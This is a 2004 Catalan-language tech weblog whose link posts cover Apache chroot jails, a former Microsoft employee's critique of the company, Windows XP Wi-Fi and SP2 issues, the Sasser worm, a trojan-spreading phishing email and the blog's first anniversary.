[Linux.com] Chrooting Apache. La instal·lació de l'Apache dins d'una gàbia chroot no fa que sigui més segur, però si serveix per limitar els fitxers que tant el procés de l'Apache com els seus fills poden accedir: únicament els fitxers dins del sistema de fitxers de la gàbia.
D'aquesta forma, en cas d'un incident de seguretat que permeti un accés remot es pot limitar la informació a la que l'atacant té accés. Ara bé, abans de decidir la instal·lació de l'Apache dins d'una gàbia cal considerar seriosament els avantatges i els desavantatges.
|
22:23 (# Enllaç permanent) ()
|
|
[Seattle Weakly] Microsoft's Sacred Cash Cow
former Microsoftie says addiction to Windows revenue, mediocre products, and missed opportunities could doom Seattle's most successful company.
(...)
I began using Microsoft products 23 years ago, at age 11, and I worked for Microsoft from 1991 to 1999 as a technology manager. For many years, I was a Microsoft loyalist. While aware of Microsoft's shortcomings, I always believed that the Soft did its best to improve products over time, as it did with Windows XP. But recently, I've had a crisis of faith. Perhaps I've rebooted Windows one too many times.
Over the past year, my frustration with Windows grew, as did my envy of Apple's cool new products.
(...)
In protecting Windows and Office revenues, Microsoft has innovated less quickly than it could have. The company relies on the same strategy that helped it years ago come to dominate the personal-computer market with the Windows operating system, despite mounting evidence that its customers are looking for a new approach. Competitors such as Linux and Google are gaining, and Microsoft seems unprepared for the road ahead.
(...)
percent of its revenue still comes from Windows and Office sales—more than 80 percent if you include the Windows server software used by so many businesses. The company must protect these core products. "The prime directive at Microsoft is to protect Windows and get customers to buy Windows and upgrades to Windows"
(...)
Microsoft clings to this strategy because it has to. Its stock price relies largely on the continued strength of Windows and the Office suite of applications (Word, Excel, Outlook, PowerPoint, etc.). But Microsoft's dominance is an aberration in an otherwise competitive technology industry. Windows, Office, and the Internet Explorer Web browser all have greater than 90 percent share of their respective markets. To protect the cash cows, Microsoft must do things that no other software company would be doing right now. It's a victim of its own success.
Microsoft hasn't solved many of the software problems I described earlier in part because of the lack of competition. "One of the most frustrating things about Windows is how it steals time from us," says Andrews, who has followed the company for years. Andrews hasn't upgraded his PC from Windows 98 or Office 2000. "I'd just as soon have a stable operating system—my time is more important."
Andrews was surprised to learn recently that Jim Allchin, Microsoft group vice president of platforms, didn't realize that many users don't buy new computers because of how hard it is to move all their data and applications. "He was totally oblivious to this," Andrews says. "It's a couple-day process. His head was in the clouds."
(...)
Recently, though, Microsoft announced that its next major Windows release, code-named "Longhorn," might be delayed beyond 2006 unless it is significantly pared down. It's already been three years since the release of Windows XP, and customers still have quality and security problems with it. Microsoft is so concerned about Windows XP security that it will likely give away its next upgrade to fix vulnerabilities and make it easier to deliver future fixes automatically.
To comprehensively address security issues, Microsoft has said it is building Longhorn from the ground up. Any time you start building an operating system from scratch, you create all sorts of unanticipated problems. If you are waiting for Microsoft to improve the consumer experience, you'll have to be patient.
(...)
How real is the open-source threat for Microsoft? Open-source technologies have always dominated Web-server software, the applications that deliver Web pages. According to NetCraft, a well-known Web site that tracks technology on the Internet, the open-source Apache Web server leads Microsoft's Internet Information Server by 67 percent to 21 percent market share. Meanwhile, open source's foray to the desktop has only begun.
(...)
Microsoft isn't blind to the open-source threat. It has appointed an experienced executive, Martin Taylor, to work more closely with open-source developers and to get corporate customers to analyze the total cost of ownership of software purchases.
(...)
My most memorable moment at Microsoft came during a technical review with Bill Gates. I will never forget the moment when I made an apparently obvious point to him. He responded, "What? Do you think I'm stupid?" Everyone was staring at me, and I felt it best not to answer. Like Gates, there were always people at Microsoft who were much smarter than me and more technically skilled. But he's created a corporate culture that sometimes struggles to see the forest for the trees—and I think this is what has led to some of the challenges that it faces today.
My biggest complaint about Microsoft is how hesitant they are to update Windows in a more modular fashion over time, instead saving innovation for large updates every several years. Apple, in contrast, is updating OS X monthly and sometimes weekly.
(...)
Meanwhile, Microsoft doesn't evoke passion in me anymore. Its products don't excite me anymore. I remember eagerly looking forward to Outlook 2003, only to be disappointed by how complex, buggy, and unimproved it was.
|
18:57 (# Enllaç permanent) ()
|
|
[Wired] Windows XP Bedevils Wi-Fi Users intenta trobar els motius pels quals, de vegades, Windows XP talla la connexió amb una xarxa sense fil, sense motiu aparent. Segons Microsoft, això no és un problema de Windows i afirmen que no tenen constància de cap problemàtica que afecti als usuaris però la realitat és que es tracta d'un problema força freqüent.
Investigant el problema, sembla que la funció d'autoconfiguració de xarxes sense fil de Windows, Wireless Zero Configuration, es torna boja. La solució consisteix en reiniciar el servei.
|
18:40 (# Enllaç permanent) ()
|
|
|
dijous, 3 / juny / 2004 |
Des de fa unes setmanes tinc un Treo 600... És un bon aparell, en molts aspectes molt millor al Treo 270: en general es un producte molt més ben acabat, encara que hi ha algun que altre detall que la veritat estava més ben resolt al model antic.
Una de les novetats del telèfons és l'existència d'una càmera de fotos integrada. No és cap meravella, ja que només dóna 0,3 megapíxels de resolució... però la veritat es que això de tenir la càmera integrada dins el telèfon va força bé.
Un exemple de foto és aquesta:
Un esquelet de moto al carrer Viriat de Barcelona.
|
23:04 (# Enllaç permanent) ()
|
|
Jon Udell comença una sèrie d'articles dedicades a explorar les novetats de Longhorn. En aquesta primera part, WinFS, el nou sistema d'emmagatzematge, basat en un motor orientat a objectes i que també realitza les funcions d'un sistema de fitxers convencional.
|
22:52 (# Enllaç permanent) ()
|
|
Google és una meravella per descobrir com la gent es dedica a plagiar i/a reproduir sense respectar els copyright. Mireu que ha publicat VNUNET.ES.
|
22:37 (# Enllaç permanent) ()
|
|
[MSDN] How to Make Your Web Site Work with Windows XP Service Pack 2: instruccions i recomanacions pels autors de pàgines web per tal de fer que les web funcionin correctament amb els equips on s'ha instal·lat el Service Pack 2 de Windows XP.
Com he comentat vàries vegades, el SP2 incorpora un entorn molt més restrictiu en comparació amb versions anteriors, el que farà canviar els hàbits de desenvolupament de molts llocs web.
Aquest canvi serà especialment significatiu en el desenvolupament d'intranets, on no es estranya la utilització de controls ActiveX, sovint molt perillosos o es basen en executar un programa directament des dins d'una pàgina. Totes aquestes pràctiques no funcionaran directament amb la configuració de seguretat del SP2 de Windows XP.
|
21:22 (# Enllaç permanent) ()
|
|
[The Register] Police slap cuffs on Punk SMSer explica els perills d'enviar un missatge SMS amb contingut «comprometedor»... com per exemple: «arribem a un acord i fem-ho: un avió i deu hostatges», que resulta ser la lletra d'una cançó...
A tech worker was arrested yesterday after a text message he sent was intercepted and traced back to his phone.
In a scene reminiscent of Neo's first escape from Agent Smith, Special Branch officers slapped the cuffs on Mike Devine at his office in Bristol yesterday, and took him away for questioning.
Devine, who plays in a Clash tribute band in his spare time, had sent a message containing lyrics from The Clash's Tommy Gun to his lead singer who had forgotten the words to the song.
According to The Sun, the message read:
"How about this for Tommy Gun? OK - SO LET'S AGREE ABOUT THE PRICE AND MAKE IT ONE JET AIRLINER AND TEN PRISONERS"
|
21:08 (# Enllaç permanent) ()
|
|
|
dimecres, 2 / juny / 2004 |
[Kuro5hin] Tutorial sobre la utilitat screen. A Bulma també hi ha un altre article, en castellà, on s'explica el funciomanet d'aquesta eina. La veritat es que fins ara mai no li havia donat importància, però sembla força interessant... serà qüestió de provar-la aquest cap de setmana.
|
07:32 (# Enllaç permanent) ()
|
|
[Security Protocols] Destructive Elegance (Overview of the W32.Sasser Worm)
Few viruses or worms have made it into documentation as extremely destructive or detrimental to the population of computer users.
(...)
One worm that seems to have had these qualities was known by the Symantec organization as W32.Sasser.A, or as simply, “The Sasser Worm.” Discovered on April 30, 2004
|
00:21 (# Enllaç permanent) ()
|
|
|
dimarts, 1 / juny / 2004 |
[The Register] Beware of 'IBM laptop order' mail. Està circulant un missatge que té l'aspecte d'una comanda d'un ordinador portàtil i s'aprofita d'una vulnerabilitat al sistema d'ajuda de Windows (per la qual encara Microsoft no ha publicat l'actualització) per tal d'instal·lar un troià a la màquina de l'usuari
Hackers tried to trick users into visiting a maliciously-constructed website using a blizzard of spam emails last week. The assault attempted to exploit a previously unknown vulnerability with Internet Explorer to seize control of the maximum number of Windows PCs.
The malicious emails - normally a fake order confirmation for an IBM Laptop PC - told the recipient that their bank account has been debited for £1,099.99 and provides a link to check or cancel the order. Following the link lead to a Web server that exploits an as yet unpatched IE vulnerability to deposit a Trojan on a user's PC.
|
21:41 (# Enllaç permanent) ()
|
|
 Bufa... això fa por! Segons aquest article, durant quinze anys el sistema de seguretat que controlava l'armament nuclear amb base fixe als Estats Units tenia una contrasenya feta de... només zeros. De fet la contrasenya era OOOOOOOO.
Cada vegada entenc més als usuaris que es queixen quan s'aplica una política restrictiva de contrasenyes!
|
21:10 (# Enllaç permanent) ()
|
|
Avui es pot dir que aquest weblog celebra el seu primer aniversari. Ara fa un any vaig fer un viatge a Suïssa per treballar en la instal·lació dels sistemes de seguretat dels serveis de banca electrònica pels clients de la divisió de banca privada d'un banc espanyol (buf! quina descripció)... i vaig aprofitar per començar a practicar en el manteniment del weblog.
Aquell weblog era força diferent en contingut a l'actual... però no pas en forma. Curiosament, en el primer post deia una cosa com aquesta, parlant sobre Radio Userland :
Costa $40 dòlars el registre i vist el que ofereix, no crec pas que em registri
Un any després, evidentment m'he registrat... el que demostra que la meva capacitat de fer prediccions és molt baixa.
Ara bé, sí que haig de dir que només dues setmanes després d'escriure allò ja reconeixia que m'havia agradat allò de mantenir un weblog i anunciava el naixement d'aquest weblog en el seu format actual:
Això vol dir que aquest weblog ja està acabat... ha estat una experiència interessant, que durant els propers dies l'aprofitaré per tal de mantenir la meva pròpia pàgina web.
|
20:36 (# Enllaç permanent) ()
|
|
|
[
Avui ja torna a fer molta calor (
Des d'avui hi ha possibilitat de 
Roba (
Acabada de publicar la versió 2.1 (
